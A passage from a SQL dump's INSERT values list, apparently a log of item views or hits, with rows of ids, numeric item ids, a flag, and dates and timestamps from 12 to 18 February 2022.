18:29:45'),(44954,1602,1,'2022-02-12','2022-02-12 20:35:28'),(44955,1602,1,'2022-02-12','2022-02-12 20:37:53'),(44956,1594,1,'2022-02-12','2022-02-12 21:30:18'),(44957,469,1,'2022-02-12','2022-02-12 23:29:51'),(44958,1602,1,'2022-02-12','2022-02-12 23:40:58'),(44959,1602,1,'2022-02-13','2022-02-13 00:27:40'),(44960,72,1,'2022-02-13','2022-02-13 00:48:54'),(44961,4457,1,'2022-02-13','2022-02-13 00:59:44'),(44962,2309,1,'2022-02-13','2022-02-13 01:30:56'),(44963,4338,1,'2022-02-13','2022-02-13 01:59:50'),(44964,2159,1,'2022-02-13','2022-02-13 02:18:21'),(44965,1608,1,'2022-02-13','2022-02-13 02:18:22'),(44966,2159,1,'2022-02-13','2022-02-13 03:18:13'),(44967,4448,1,'2022-02-13','2022-02-13 03:41:10'),(44968,1608,1,'2022-02-13','2022-02-13 05:18:10'),(44969,3698,1,'2022-02-13','2022-02-13 06:18:09'),(44970,1602,1,'2022-02-13','2022-02-13 07:01:53'),(44971,2297,1,'2022-02-13','2022-02-13 07:08:47'),(44972,2297,1,'2022-02-13','2022-02-13 07:40:19'),(44973,1588,1,'2022-02-13','2022-02-13 07:49:42'),(44974,2457,1,'2022-02-13','2022-02-13 08:10:06'),(44975,2457,1,'2022-02-13','2022-02-13 08:19:45'),(44976,3781,1,'2022-02-13','2022-02-13 08:33:55'),(44977,80,1,'2022-02-13','2022-02-13 08:40:30'),(44978,1600,1,'2022-02-13','2022-02-13 08:52:14'),(44979,1592,1,'2022-02-13','2022-02-13 09:00:20'),(44980,1606,1,'2022-02-13','2022-02-13 09:08:50'),(44981,1586,1,'2022-02-13','2022-02-13 09:12:21'),(44982,108,1,'2022-02-13','2022-02-13 09:39:50'),(44983,3053,1,'2022-02-13','2022-02-13 10:02:35'),(44984,1774,1,'2022-02-13','2022-02-13 10:13:36'),(44985,1544,1,'2022-02-13','2022-02-13 10:38:52'),(44986,484,1,'2022-02-13','2022-02-13 11:36:43'),(44987,1544,1,'2022-02-13','2022-02-13 11:38:46'),(44988,1608,1,'2022-02-13','2022-02-13 12:25:11'),(44989,1594,1,'2022-02-13','2022-02-13 12:48:23'),(44990,3240,1,'2022-02-13','2022-02-13 13:22:21'),(44991,1594,1,'2022-02-13','2022-02-13 13:42:59'),(44992,1586,1,'2022-02-13','2022-02-13 13:49:03'),(44993,3240,1,'2022-02-13','2022-02-13 13:58:43'),(44994,1600,1,'2022-02-13','2022-02-13 14:29:26'),(44995,2769,1,'2022-02-13','2022-02-13 14:56:35'),(44996,2769,1,'2022-02-13','2022-02-13 14:56:43'),(44997,3041,1,'2022-02-13','2022-02-13 15:42:20'),(44998,1718,1,'2022-02-13','2022-02-13 15:44:04'),(44999,1606,1,'2022-02-13','2022-02-13 16:55:43'),(45000,72,1,'2022-02-13','2022-02-13 17:08:29'),(45001,3764,1,'2022-02-13','2022-02-13 17:10:00'),(45002,1596,1,'2022-02-13','2022-02-13 17:38:37'),(45003,1606,1,'2022-02-13','2022-02-13 17:47:18'),(45004,2813,1,'2022-02-13','2022-02-13 17:48:10'),(45005,2813,1,'2022-02-13','2022-02-13 17:48:11'),(45006,2159,1,'2022-02-13','2022-02-13 18:17:16'),(45007,1606,1,'2022-02-13','2022-02-13 18:17:25'),(45008,108,1,'2022-02-13','2022-02-13 18:47:31'),(45009,1610,1,'2022-02-13','2022-02-13 19:11:18'),(45010,3102,1,'2022-02-13','2022-02-13 20:03:59'),(45011,1602,1,'2022-02-13','2022-02-13 20:20:18'),(45012,4238,1,'2022-02-13','2022-02-13 20:43:05'),(45013,2309,1,'2022-02-13','2022-02-13 21:35:33'),(45014,1592,1,'2022-02-13','2022-02-13 21:56:30'),(45015,1598,1,'2022-02-13','2022-02-13 22:30:17'),(45016,2297,1,'2022-02-13','2022-02-13 23:43:08'),(45017,2154,1,'2022-02-14','2022-02-14 00:13:42'),(45018,1718,1,'2022-02-14','2022-02-14 00:33:03'),(45019,1614,1,'2022-02-14','2022-02-14 00:49:17'),(45020,72,1,'2022-02-14','2022-02-14 01:13:33'),(45021,4542,1,'2022-02-14','2022-02-14 01:53:55'),(45022,1544,1,'2022-02-14','2022-02-14 04:04:59'),(45023,108,1,'2022-02-14','2022-02-14 04:36:52'),(45024,2159,1,'2022-02-14','2022-02-14 05:48:58'),(45025,3083,1,'2022-02-14','2022-02-14 05:56:46'),(45026,1602,1,'2022-02-14','2022-02-14 06:03:05'),(45027,2813,1,'2022-02-14','2022-02-14 07:03:51'),(45028,2309,1,'2022-02-14','2022-02-14 08:46:05'),(45029,2297,1,'2022-02-14','2022-02-14 08:53:02'),(45030,469,1,'2022-02-14','2022-02-14 08:58:28'),(45031,1602,1,'2022-02-14','2022-02-14 10:17:55'),(45032,2609,1,'2022-02-14','2022-02-14 10:24:23'),(45033,467,1,'2022-02-14','2022-02-14 10:28:06'),(45034,1602,1,'2022-02-14','2022-02-14 10:44:38'),(45035,68,1,'2022-02-14','2022-02-14 10:45:47'),(45036,68,1,'2022-02-14','2022-02-14 10:45:58'),(45037,68,1,'2022-02-14','2022-02-14 10:48:36'),(45038,1709,1,'2022-02-14','2022-02-14 10:54:08'),(45039,89,1,'2022-02-14','2022-02-14 11:19:13'),(45040,1606,1,'2022-02-14','2022-02-14 11:24:25'),(45041,1582,1,'2022-02-14','2022-02-14 11:37:44'),(45042,3072,1,'2022-02-14','2022-02-14 11:55:40'),(45043,4326,1,'2022-02-14','2022-02-14 12:24:54'),(45044,2165,1,'2022-02-14','2022-02-14 12:26:52'),(45045,484,1,'2022-02-14','2022-02-14 12:44:42'),(45046,1602,1,'2022-02-14','2022-02-14 12:46:34'),(45047,1728,1,'2022-02-14','2022-02-14 12:53:54'),(45048,1586,1,'2022-02-14','2022-02-14 13:48:04'),(45049,1586,1,'2022-02-14','2022-02-14 13:48:06'),(45050,68,1,'2022-02-14','2022-02-14 14:09:33'),(45051,68,1,'2022-02-14','2022-02-14 14:13:15'),(45052,68,1,'2022-02-14','2022-02-14 15:01:32'),(45053,1602,1,'2022-02-14','2022-02-14 15:34:39'),(45054,472,1,'2022-02-14','2022-02-14 16:48:45'),(45055,2813,1,'2022-02-14','2022-02-14 17:07:41'),(45056,108,1,'2022-02-14','2022-02-14 17:17:40'),(45057,72,1,'2022-02-14','2022-02-14 17:35:20'),(45058,2297,1,'2022-02-14','2022-02-14 17:39:06'),(45059,2297,1,'2022-02-14','2022-02-14 18:09:08'),(45060,4517,1,'2022-02-14','2022-02-14 19:04:09'),(45061,4514,1,'2022-02-14','2022-02-14 19:05:24'),(45062,2154,1,'2022-02-14','2022-02-14 19:09:04'),(45063,1588,1,'2022-02-14','2022-02-14 19:27:04'),(45064,4520,1,'2022-02-14','2022-02-14 19:28:30'),(45065,4457,1,'2022-02-14','2022-02-14 19:53:46'),(45066,1586,1,'2022-02-14','2022-02-14 20:43:25'),(45067,3267,1,'2022-02-14','2022-02-14 21:05:21'),(45068,570,1,'2022-02-14','2022-02-14 21:27:02'),(45069,3534,1,'2022-02-14','2022-02-14 21:40:54'),(45070,3267,1,'2022-02-14','2022-02-14 21:42:32'),(45071,2748,1,'2022-02-14','2022-02-14 21:42:35'),(45072,468,1,'2022-02-14','2022-02-14 21:42:40'),(45073,2751,1,'2022-02-14','2022-02-14 21:42:41'),(45074,3267,1,'2022-02-14','2022-02-14 21:43:05'),(45075,3267,1,'2022-02-14','2022-02-14 21:43:09'),(45076,3267,1,'2022-02-14','2022-02-14 21:43:21'),(45077,2617,1,'2022-02-14','2022-02-14 21:43:38'),(45078,2748,1,'2022-02-14','2022-02-14 21:43:57'),(45079,2775,1,'2022-02-14','2022-02-14 21:44:01'),(45080,2748,1,'2022-02-14','2022-02-14 21:44:11'),(45081,2617,1,'2022-02-14','2022-02-14 21:44:14'),(45082,2558,1,'2022-02-14','2022-02-14 21:44:19'),(45083,89,1,'2022-02-14','2022-02-14 21:44:49'),(45084,91,1,'2022-02-14','2022-02-14 21:44:52'),(45085,4524,1,'2022-02-14','2022-02-14 21:45:00'),(45086,4529,1,'2022-02-14','2022-02-14 21:45:09'),(45087,4524,1,'2022-02-14','2022-02-14 21:45:11'),(45088,4514,1,'2022-02-14','2022-02-14 21:45:25'),(45089,4400,1,'2022-02-14','2022-02-14 21:45:35'),(45090,4341,1,'2022-02-14','2022-02-14 21:45:51'),(45091,1600,1,'2022-02-14','2022-02-14 21:46:05'),(45092,4524,1,'2022-02-14','2022-02-14 21:50:48'),(45093,3534,1,'2022-02-14','2022-02-14 21:52:09'),(45094,4326,1,'2022-02-14','2022-02-14 21:52:11'),(45095,4341,1,'2022-02-14','2022-02-14 22:03:01'),(45096,3534,1,'2022-02-14','2022-02-14 22:29:17'),(45097,3534,1,'2022-02-14','2022-02-14 22:30:26'),(45098,469,1,'2022-02-14','2022-02-14 22:42:42'),(45099,1602,1,'2022-02-15','2022-02-15 00:42:06'),(45100,72,1,'2022-02-15','2022-02-15 00:43:07'),(45101,2159,1,'2022-02-15','2022-02-15 00:53:18'),(45102,1600,1,'2022-02-15','2022-02-15 00:54:56'),(45103,472,1,'2022-02-15','2022-02-15 00:58:26'),(45104,1594,1,'2022-02-15','2022-02-15 01:01:29'),(45105,2457,1,'2022-02-15','2022-02-15 01:03:58'),(45106,3781,1,'2022-02-15','2022-02-15 01:06:50'),(45107,68,1,'2022-02-15','2022-02-15 01:10:19'),(45108,467,1,'2022-02-15','2022-02-15 01:14:10'),(45109,2309,1,'2022-02-15','2022-02-15 01:22:20'),(45110,4524,1,'2022-02-15','2022-02-15 01:24:29'),(45111,2309,1,'2022-02-15','2022-02-15 01:28:02'),(45112,1598,1,'2022-02-15','2022-02-15 01:31:33'),(45113,4520,1,'2022-02-15','2022-02-15 01:35:01'),(45114,3127,1,'2022-02-15','2022-02-15 01:38:40'),(45115,4514,1,'2022-02-15','2022-02-15 01:50:51'),(45116,2813,1,'2022-02-15','2022-02-15 01:54:04'),(45117,1582,1,'2022-02-15','2022-02-15 01:58:41'),(45118,1594,1,'2022-02-15','2022-02-15 02:03:03'),(45119,1872,1,'2022-02-15','2022-02-15 02:09:24'),(45120,4529,1,'2022-02-15','2022-02-15 02:13:53'),(45121,3764,1,'2022-02-15','2022-02-15 02:21:33'),(45122,1612,1,'2022-02-15','2022-02-15 02:26:09'),(45123,1877,1,'2022-02-15','2022-02-15 02:32:04'),(45124,469,1,'2022-02-15','2022-02-15 02:42:19'),(45125,1602,1,'2022-02-15','2022-02-15 03:11:02'),(45126,570,1,'2022-02-15','2022-02-15 03:11:57'),(45127,1588,1,'2022-02-15','2022-02-15 03:28:40'),(45128,2148,1,'2022-02-15','2022-02-15 03:56:06'),(45129,2148,1,'2022-02-15','2022-02-15 03:58:09'),(45130,0,1,'2022-02-15','2022-02-15 03:59:19'),(45131,1614,1,'2022-02-15','2022-02-15 04:29:52'),(45132,335,1,'2022-02-15','2022-02-15 04:47:58'),(45133,68,1,'2022-02-15','2022-02-15 04:48:11'),(45134,472,1,'2022-02-15','2022-02-15 04:58:31'),(45135,80,1,'2022-02-15','2022-02-15 05:28:47'),(45136,1608,1,'2022-02-15','2022-02-15 05:53:41'),(45137,1608,1,'2022-02-15','2022-02-15 06:23:57'),(45138,1600,1,'2022-02-15','2022-02-15 06:48:22'),(45139,3698,1,'2022-02-15','2022-02-15 07:23:28'),(45140,3006,1,'2022-02-15','2022-02-15 07:28:23'),(45141,469,1,'2022-02-15','2022-02-15 07:48:23'),(45142,72,1,'2022-02-15','2022-02-15 07:58:24'),(45143,1766,1,'2022-02-15','2022-02-15 08:32:10'),(45144,2410,1,'2022-02-15','2022-02-15 08:48:25'),(45145,1588,1,'2022-02-15','2022-02-15 09:08:25'),(45146,1598,1,'2022-02-15','2022-02-15 09:49:21'),(45147,2813,1,'2022-02-15','2022-02-15 09:59:05'),(45148,2813,1,'2022-02-15','2022-02-15 10:02:44'),(45149,2989,1,'2022-02-15','2022-02-15 10:28:25'),(45150,1582,1,'2022-02-15','2022-02-15 10:48:26'),(45151,3282,1,'2022-02-15','2022-02-15 11:39:45'),(45152,1594,1,'2022-02-15','2022-02-15 12:18:46'),(45153,1602,1,'2022-02-15','2022-02-15 12:32:43'),(45154,91,1,'2022-02-15','2022-02-15 12:39:00'),(45155,1606,1,'2022-02-15','2022-02-15 12:55:09'),(45156,3482,1,'2022-02-15','2022-02-15 12:56:24'),(45157,4400,1,'2022-02-15','2022-02-15 13:08:23'),(45158,80,1,'2022-02-15','2022-02-15 13:21:31'),(45159,1695,1,'2022-02-15','2022-02-15 13:51:13'),(45160,1695,1,'2022-02-15','2022-02-15 13:51:19'),(45161,1695,1,'2022-02-15','2022-02-15 13:51:31'),(45162,1695,1,'2022-02-15','2022-02-15 13:52:14'),(45163,2904,1,'2022-02-15','2022-02-15 14:17:12'),(45164,4529,1,'2022-02-15','2022-02-15 14:43:51'),(45165,2297,1,'2022-02-15','2022-02-15 14:54:12'),(45166,87,1,'2022-02-15','2022-02-15 15:08:25'),(45167,487,1,'2022-02-15','2022-02-15 15:09:35'),(45168,87,1,'2022-02-15','2022-02-15 15:10:28'),(45169,473,1,'2022-02-15','2022-02-15 15:10:40'),(45170,87,1,'2022-02-15','2022-02-15 15:11:43'),(45171,1598,1,'2022-02-15','2022-02-15 15:11:45'),(45172,488,1,'2022-02-15','2022-02-15 15:16:31'),(45173,87,1,'2022-02-15','2022-02-15 15:16:39'),(45174,487,1,'2022-02-15','2022-02-15 15:16:50'),(45175,87,1,'2022-02-15','2022-02-15 15:16:58'),(45176,486,1,'2022-02-15','2022-02-15 15:17:04'),(45177,485,1,'2022-02-15','2022-02-15 15:19:24'),(45178,87,1,'2022-02-15','2022-02-15 15:19:54'),(45179,4454,1,'2022-02-15','2022-02-15 15:45:56'),(45180,72,1,'2022-02-15','2022-02-15 15:56:17'),(45181,1718,1,'2022-02-15','2022-02-15 16:11:11'),(45182,3087,1,'2022-02-15','2022-02-15 16:24:55'),(45183,2309,1,'2022-02-15','2022-02-15 16:35:44'),(45184,2309,1,'2022-02-15','2022-02-15 16:39:06'),(45185,1588,1,'2022-02-15','2022-02-15 16:58:23'),(45186,4457,1,'2022-02-15','2022-02-15 17:07:16'),(45187,1614,1,'2022-02-15','2022-02-15 17:08:23'),(45188,1877,1,'2022-02-15','2022-02-15 17:18:24'),(45189,80,1,'2022-02-15','2022-02-15 17:39:01'),(45190,2769,1,'2022-02-15','2022-02-15 17:58:41'),(45191,89,1,'2022-02-15','2022-02-15 18:16:33'),(45192,1594,1,'2022-02-15','2022-02-15 18:19:02'),(45193,89,1,'2022-02-15','2022-02-15 18:19:22'),(45194,1590,1,'2022-02-15','2022-02-15 18:19:48'),(45195,89,1,'2022-02-15','2022-02-15 18:20:06'),(45196,1594,1,'2022-02-15','2022-02-15 18:35:36'),(45197,1720,1,'2022-02-15','2022-02-15 18:46:25'),(45198,4238,1,'2022-02-15','2022-02-15 18:46:33'),(45199,1778,1,'2022-02-15','2022-02-15 20:38:21'),(45200,2252,1,'2022-02-15','2022-02-15 20:57:07'),(45201,1604,1,'2022-02-15','2022-02-15 21:09:06'),(45202,1592,1,'2022-02-15','2022-02-15 21:51:54'),(45203,1586,1,'2022-02-15','2022-02-15 22:34:43'),(45204,470,1,'2022-02-15','2022-02-15 22:53:04'),(45205,2457,1,'2022-02-15','2022-02-15 23:00:19'),(45206,3531,1,'2022-02-15','2022-02-15 23:50:17'),(45207,3243,1,'2022-02-16','2022-02-16 00:05:58'),(45208,2956,1,'2022-02-16','2022-02-16 00:20:17'),(45209,72,1,'2022-02-16','2022-02-16 00:24:02'),(45210,1600,1,'2022-02-16','2022-02-16 00:40:06'),(45211,4457,1,'2022-02-16','2022-02-16 00:50:05'),(45212,3752,1,'2022-02-16','2022-02-16 00:50:17'),(45213,468,1,'2022-02-16','2022-02-16 01:20:37'),(45214,3781,1,'2022-02-16','2022-02-16 01:35:33'),(45215,1594,1,'2022-02-16','2022-02-16 02:25:21'),(45216,3092,1,'2022-02-16','2022-02-16 02:35:42'),(45217,3243,1,'2022-02-16','2022-02-16 02:50:30'),(45218,1598,1,'2022-02-16','2022-02-16 03:05:21'),(45219,1600,1,'2022-02-16','2022-02-16 04:46:23'),(45220,1745,1,'2022-02-16','2022-02-16 04:46:29'),(45221,2159,1,'2022-02-16','2022-02-16 04:46:34'),(45222,2297,1,'2022-02-16','2022-02-16 04:47:03'),(45223,108,1,'2022-02-16','2022-02-16 04:47:34'),(45224,1582,1,'2022-02-16','2022-02-16 05:02:07'),(45225,1588,1,'2022-02-16','2022-02-16 05:10:10'),(45226,91,1,'2022-02-16','2022-02-16 05:17:12'),(45227,1582,1,'2022-02-16','2022-02-16 05:25:27'),(45228,1718,1,'2022-02-16','2022-02-16 05:42:18'),(45229,3107,1,'2022-02-16','2022-02-16 06:03:16'),(45230,3056,1,'2022-02-16','2022-02-16 06:06:01'),(45231,2911,1,'2022-02-16','2022-02-16 06:53:53'),(45232,3267,1,'2022-02-16','2022-02-16 07:12:44'),(45233,2410,1,'2022-02-16','2022-02-16 07:17:58'),(45234,1776,1,'2022-02-16','2022-02-16 07:20:45'),(45235,2609,1,'2022-02-16','2022-02-16 07:45:23'),(45236,2609,1,'2022-02-16','2022-02-16 07:45:38'),(45237,2609,1,'2022-02-16','2022-02-16 07:46:47'),(45238,4457,1,'2022-02-16','2022-02-16 08:09:02'),(45239,2395,1,'2022-02-16','2022-02-16 08:19:58'),(45240,72,1,'2022-02-16','2022-02-16 08:29:14'),(45241,1602,1,'2022-02-16','2022-02-16 08:31:26'),(45242,2609,1,'2022-02-16','2022-02-16 08:48:07'),(45243,2609,1,'2022-02-16','2022-02-16 08:49:09'),(45244,2609,1,'2022-02-16','2022-02-16 08:51:10'),(45245,1586,1,'2022-02-16','2022-02-16 09:31:52'),(45246,1594,1,'2022-02-16','2022-02-16 09:39:24'),(45247,1588,1,'2022-02-16','2022-02-16 09:53:23'),(45248,1588,1,'2022-02-16','2022-02-16 09:53:42'),(45249,2159,1,'2022-02-16','2022-02-16 10:03:12'),(45250,2159,1,'2022-02-16','2022-02-16 10:03:14'),(45251,2159,1,'2022-02-16','2022-02-16 10:03:20'),(45252,2159,1,'2022-02-16','2022-02-16 10:03:39'),(45253,2159,1,'2022-02-16','2022-02-16 10:54:37'),(45254,2159,1,'2022-02-16','2022-02-16 10:54:38'),(45255,2159,1,'2022-02-16','2022-02-16 10:56:15'),(45256,2309,1,'2022-02-16','2022-02-16 11:42:34'),(45257,2904,1,'2022-02-16','2022-02-16 11:44:35'),(45258,2904,1,'2022-02-16','2022-02-16 11:44:44'),(45259,91,1,'2022-02-16','2022-02-16 11:46:00'),(45260,91,1,'2022-02-16','2022-02-16 11:46:20'),(45261,91,1,'2022-02-16','2022-02-16 11:46:26'),(45262,2159,1,'2022-02-16','2022-02-16 11:50:18'),(45263,4377,1,'2022-02-16','2022-02-16 11:54:38'),(45264,4432,1,'2022-02-16','2022-02-16 12:04:39'),(45265,1544,1,'2022-02-16','2022-02-16 12:31:25'),(45266,89,1,'2022-02-16','2022-02-16 12:42:27'),(45267,1582,1,'2022-02-16','2022-02-16 12:43:10'),(45268,89,1,'2022-02-16','2022-02-16 12:45:21'),(45269,3901,1,'2022-02-16','2022-02-16 12:49:25'),(45270,4420,1,'2022-02-16','2022-02-16 13:34:19'),(45271,1598,1,'2022-02-16','2022-02-16 13:41:41'),(45272,87,1,'2022-02-16','2022-02-16 13:53:45'),(45273,483,1,'2022-02-16','2022-02-16 13:57:34'),(45274,484,1,'2022-02-16','2022-02-16 14:01:08'),(45275,485,1,'2022-02-16','2022-02-16 14:01:29'),(45276,1606,1,'2022-02-16','2022-02-16 15:00:05'),(45277,87,1,'2022-02-16','2022-02-16 15:25:28'),(45278,2159,1,'2022-02-16','2022-02-16 15:46:32'),(45279,72,1,'2022-02-16','2022-02-16 16:04:27'),(45280,76,1,'2022-02-16','2022-02-16 16:17:15'),(45281,3257,1,'2022-02-16','2022-02-16 16:17:15'),(45282,1586,1,'2022-02-16','2022-02-16 16:32:00'),(45283,1600,1,'2022-02-16','2022-02-16 17:17:19'),(45284,1608,1,'2022-02-16','2022-02-16 18:02:59'),(45285,1596,1,'2022-02-16','2022-02-16 18:03:00'),(45286,2309,1,'2022-02-16','2022-02-16 18:07:11'),(45287,3691,1,'2022-02-16','2022-02-16 18:11:15'),(45288,1612,1,'2022-02-16','2022-02-16 18:19:30'),(45289,1586,1,'2022-02-16','2022-02-16 18:23:39'),(45290,3764,1,'2022-02-16','2022-02-16 18:27:44'),(45291,2989,1,'2022-02-16','2022-02-16 18:44:05'),(45292,3691,1,'2022-02-16','2022-02-16 18:52:18'),(45293,2503,1,'2022-02-16','2022-02-16 19:00:30'),(45294,4485,1,'2022-02-16','2022-02-16 19:02:58'),(45295,3698,1,'2022-02-16','2022-02-16 19:03:00'),(45296,4524,1,'2022-02-16','2022-02-16 19:08:43'),(45297,1586,1,'2022-02-16','2022-02-16 19:23:31'),(45298,1602,1,'2022-02-16','2022-02-16 19:33:23'),(45299,1594,1,'2022-02-16','2022-02-16 19:41:48'),(45300,469,1,'2022-02-16','2022-02-16 19:49:50'),(45301,1604,1,'2022-02-16','2022-02-16 19:58:14'),(45302,3271,1,'2022-02-16','2022-02-16 20:03:04'),(45303,469,1,'2022-02-16','2022-02-16 20:26:06'),(45304,3030,1,'2022-02-16','2022-02-16 20:28:04'),(45305,3056,1,'2022-02-16','2022-02-16 21:07:17'),(45306,2609,1,'2022-02-16','2022-02-16 21:13:10'),(45307,1582,1,'2022-02-16','2022-02-16 21:29:46'),(45308,3781,1,'2022-02-16','2022-02-16 21:58:03'),(45309,108,1,'2022-02-16','2022-02-16 22:03:38'),(45310,570,1,'2022-02-16','2022-02-16 22:16:33'),(45311,2956,1,'2022-02-16','2022-02-16 22:46:06'),(45312,1602,1,'2022-02-16','2022-02-16 22:49:45'),(45313,1711,1,'2022-02-16','2022-02-16 23:11:27'),(45314,72,1,'2022-02-16','2022-02-16 23:55:12'),(45315,1588,1,'2022-02-17','2022-02-17 00:01:47'),(45316,2704,1,'2022-02-17','2022-02-17 00:16:23'),(45317,4301,1,'2022-02-17','2022-02-17 01:09:53'),(45318,2159,1,'2022-02-17','2022-02-17 01:11:10'),(45319,2159,1,'2022-02-17','2022-02-17 01:12:47'),(45320,1588,1,'2022-02-17','2022-02-17 02:16:33'),(45321,1614,1,'2022-02-17','2022-02-17 02:31:59'),(45322,1598,1,'2022-02-17','2022-02-17 02:47:12'),(45323,3030,1,'2022-02-17','2022-02-17 03:03:35'),(45324,472,1,'2022-02-17','2022-02-17 04:17:05'),(45325,2813,1,'2022-02-17','2022-02-17 04:23:35'),(45326,1598,1,'2022-02-17','2022-02-17 04:32:35'),(45327,1877,1,'2022-02-17','2022-02-17 04:42:41'),(45328,1602,1,'2022-02-17','2022-02-17 04:47:21'),(45329,1602,1,'2022-02-17','2022-02-17 04:47:39'),(45330,570,1,'2022-02-17','2022-02-17 05:34:57'),(45331,467,1,'2022-02-17','2022-02-17 06:02:27'),(45332,1608,1,'2022-02-17','2022-02-17 06:07:14'),(45333,3041,1,'2022-02-17','2022-02-17 06:35:18'),(45334,2159,1,'2022-02-17','2022-02-17 07:13:16'),(45335,1608,1,'2022-02-17','2022-02-17 07:35:06'),(45336,2609,1,'2022-02-17','2022-02-17 07:36:22'),(45337,72,1,'2022-02-17','2022-02-17 07:36:52'),(45338,4416,1,'2022-02-17','2022-02-17 08:05:05'),(45339,3721,1,'2022-02-17','2022-02-17 08:13:37'),(45340,469,1,'2022-02-17','2022-02-17 08:24:43'),(45341,2309,1,'2022-02-17','2022-02-17 09:07:24'),(45342,2309,1,'2022-02-17','2022-02-17 09:07:38'),(45343,2309,1,'2022-02-17','2022-02-17 09:07:59'),(45344,2609,1,'2022-02-17','2022-02-17 09:12:45'),(45345,1602,1,'2022-02-17','2022-02-17 09:14:14'),(45346,3724,1,'2022-02-17','2022-02-17 09:15:30'),(45347,2248,1,'2022-02-17','2022-02-17 09:16:02'),(45348,3724,1,'2022-02-17','2022-02-17 09:16:33'),(45349,2751,1,'2022-02-17','2022-02-17 09:50:22'),(45350,4566,1,'2022-02-17','2022-02-17 09:55:20'),(45351,2457,1,'2022-02-17','2022-02-17 10:08:56'),(45352,2617,1,'2022-02-17','2022-02-17 10:10:00'),(45353,1703,1,'2022-02-17','2022-02-17 10:12:08'),(45354,1770,1,'2022-02-17','2022-02-17 10:18:20'),(45355,1770,1,'2022-02-17','2022-02-17 10:18:36'),(45356,1770,1,'2022-02-17','2022-02-17 10:18:49'),(45357,1770,1,'2022-02-17','2022-02-17 10:19:16'),(45358,1604,1,'2022-02-17','2022-02-17 10:46:06'),(45359,2609,1,'2022-02-17','2022-02-17 11:03:35'),(45360,2154,1,'2022-02-17','2022-02-17 11:04:45'),(45361,2609,1,'2022-02-17','2022-02-17 11:06:00'),(45362,84,1,'2022-02-17','2022-02-17 11:23:54'),(45363,91,1,'2022-02-17','2022-02-17 11:24:04'),(45364,1602,1,'2022-02-17','2022-02-17 11:24:29'),(45365,1604,1,'2022-02-17','2022-02-17 12:44:30'),(45366,2159,1,'2022-02-17','2022-02-17 13:03:55'),(45367,1602,1,'2022-02-17','2022-02-17 13:03:59'),(45368,76,1,'2022-02-17','2022-02-17 13:04:17'),(45369,2769,1,'2022-02-17','2022-02-17 13:04:28'),(45370,76,1,'2022-02-17','2022-02-17 13:04:44'),(45371,1602,1,'2022-02-17','2022-02-17 13:04:50'),(45372,2159,1,'2022-02-17','2022-02-17 13:04:52'),(45373,3313,1,'2022-02-17','2022-02-17 13:17:16'),(45374,1596,1,'2022-02-17','2022-02-17 13:25:35'),(45375,1598,1,'2022-02-17','2022-02-17 13:28:37'),(45376,3107,1,'2022-02-17','2022-02-17 13:40:29'),(45377,2309,1,'2022-02-17','2022-02-17 14:08:31'),(45378,488,1,'2022-02-17','2022-02-17 14:10:39'),(45379,3107,1,'2022-02-17','2022-02-17 14:25:38'),(45380,4332,1,'2022-02-17','2022-02-17 14:28:47'),(45381,4424,1,'2022-02-17','2022-02-17 14:40:33'),(45382,1600,1,'2022-02-17','2022-02-17 14:52:30'),(45383,1612,1,'2022-02-17','2022-02-17 15:04:38'),(45384,2411,1,'2022-02-17','2022-02-17 15:10:33'),(45385,1598,1,'2022-02-17','2022-02-17 15:13:30'),(45386,4420,1,'2022-02-17','2022-02-17 15:34:04'),(45387,1612,1,'2022-02-17','2022-02-17 15:38:41'),(45388,4323,1,'2022-02-17','2022-02-17 16:17:49'),(45389,72,1,'2022-02-17','2022-02-17 16:24:14'),(45390,4436,1,'2022-02-17','2022-02-17 17:06:08'),(45391,4416,1,'2022-02-17','2022-02-17 18:02:10'),(45392,2159,1,'2022-02-17','2022-02-17 18:10:55'),(45393,3781,1,'2022-02-17','2022-02-17 18:47:36'),(45394,72,1,'2022-02-17','2022-02-17 19:33:47'),(45395,1604,1,'2022-02-17','2022-02-17 20:08:30'),(45396,1600,1,'2022-02-17','2022-02-17 20:16:28'),(45397,2609,1,'2022-02-17','2022-02-17 20:17:37'),(45398,2617,1,'2022-02-17','2022-02-17 20:18:09'),(45399,2609,1,'2022-02-17','2022-02-17 20:19:31'),(45400,2609,1,'2022-02-17','2022-02-17 20:19:54'),(45401,1592,1,'2022-02-17','2022-02-17 20:30:06'),(45402,1584,1,'2022-02-17','2022-02-17 20:55:04'),(45403,2769,1,'2022-02-17','2022-02-17 20:55:07'),(45404,1872,1,'2022-02-17','2022-02-17 21:41:20'),(45405,1608,1,'2022-02-17','2022-02-17 21:42:23'),(45406,3710,1,'2022-02-17','2022-02-17 22:19:58'),(45407,1586,1,'2022-02-17','2022-02-17 22:28:09'),(45408,2159,1,'2022-02-17','2022-02-17 22:31:34'),(45409,2159,1,'2022-02-17','2022-02-17 22:35:47'),(45410,2159,1,'2022-02-17','2022-02-17 22:36:25'),(45411,1600,1,'2022-02-17','2022-02-17 23:30:00'),(45412,1600,1,'2022-02-17','2022-02-17 23:30:11'),(45413,4520,1,'2022-02-18','2022-02-18 00:35:33'),(45414,4520,1,'2022-02-18','2022-02-18 00:57:18'),(45415,72,1,'2022-02-18','2022-02-18 01:11:17'),(45416,1586,1,'2022-02-18','2022-02-18 01:20:20'),(45417,2309,1,'2022-02-18','2022-02-18 01:51:21'),(45418,4408,1,'2022-02-18','2022-02-18 01:51:30'),(45419,3691,1,'2022-02-18','2022-02-18 02:01:21'),(45420,1772,1,'2022-02-18','2022-02-18 02:34:56'),(45421,472,1,'2022-02-18','2022-02-18 02:39:57'),(45422,2457,1,'2022-02-18','2022-02-18 03:00:04'),(45423,1612,1,'2022-02-18','2022-02-18 03:29:58'),(45424,570,1,'2022-02-18','2022-02-18 04:00:02'),(45425,1728,1,'2022-02-18','2022-02-18 04:01:08'),(45426,1728,1,'2022-02-18','2022-02-18 04:02:21'),(45427,1602,1,'2022-02-18','2022-02-18 04:02:35'),(45428,3781,1,'2022-02-18','2022-02-18 04:30:06'),(45429,1728,1,'2022-02-18','2022-02-18 04:42:07'),(45430,1602,1,'2022-02-18','2022-02-18 04:42:10'),(45431,1718,1,'2022-02-18','2022-02-18 04:46:16'),(45432,1588,1,'2022-02-18','2022-02-18 05:02:28'),(45433,1612,1,'2022-02-18','2022-02-18 05:59:59'),(45434,1614,1,'2022-02-18','2022-02-18 06:35:30'),(45435,1582,1,'2022-02-18','2022-02-18 06:49:39'),(45436,2297,1,'2022-02-18','2022-02-18 06:50:15'),(45437,2297,1,'2022-02-18','2022-02-18 07:49:32'),(45438,3030,1,'2022-02-18','2022-02-18 08:00:05'),(45439,72,1,'2022-02-18','2022-02-18 08:08:03'),(45440,1718,1,'2022-02-18','2022-02-18 